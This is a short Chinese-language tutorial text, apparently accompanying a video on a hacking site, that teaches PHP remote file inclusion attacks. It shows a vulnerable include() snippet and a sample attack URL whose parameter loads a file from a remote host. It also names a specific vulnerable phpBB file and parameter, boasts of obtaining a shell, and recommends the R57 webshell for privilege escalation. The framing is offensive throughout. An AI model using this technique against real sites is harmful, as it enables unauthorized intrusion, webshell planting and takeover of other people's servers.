动画介绍:今天是教大家用PHP远程包含`以前也做过拉~但是很多朋友还是问我
所以我再做一个~这次我尽量搞详细点~很多朋友对PHP站无从下手~
反正我觉得PHP站的漏洞不会少于ASP~而且最容易拿SHELL的就是远程包含
<?php
include($include."/a.php");
?>
$include已经设置好路径,但是我们可以通过构造一个路径来达到攻击的目的.
比方说我们提交:
http://www.xxx.comindex.php?include=http://web/a.php
这个漏洞是PHP独有的~别的脚本语言是没有的`好拉~看操作
每个远程包含必定有个包含目录~意思就是说哪个漏洞参数就在哪个包含目录里
/inludes/
functions_portal.php? 这个就是哪个出现漏洞的文件phpbb_root_path= 这个就是哪个
漏洞参数拉
看见了没 一个SHELL就这样拿下拉~
有点乱码~建议大家用R57~哪个马有方便提权~
好了教程结束
这个是最后一次做同样的教程~以后别问了哦~我都烦拉~大家8888 |
安全中国首页 > 动画中心 > 综合注入动画
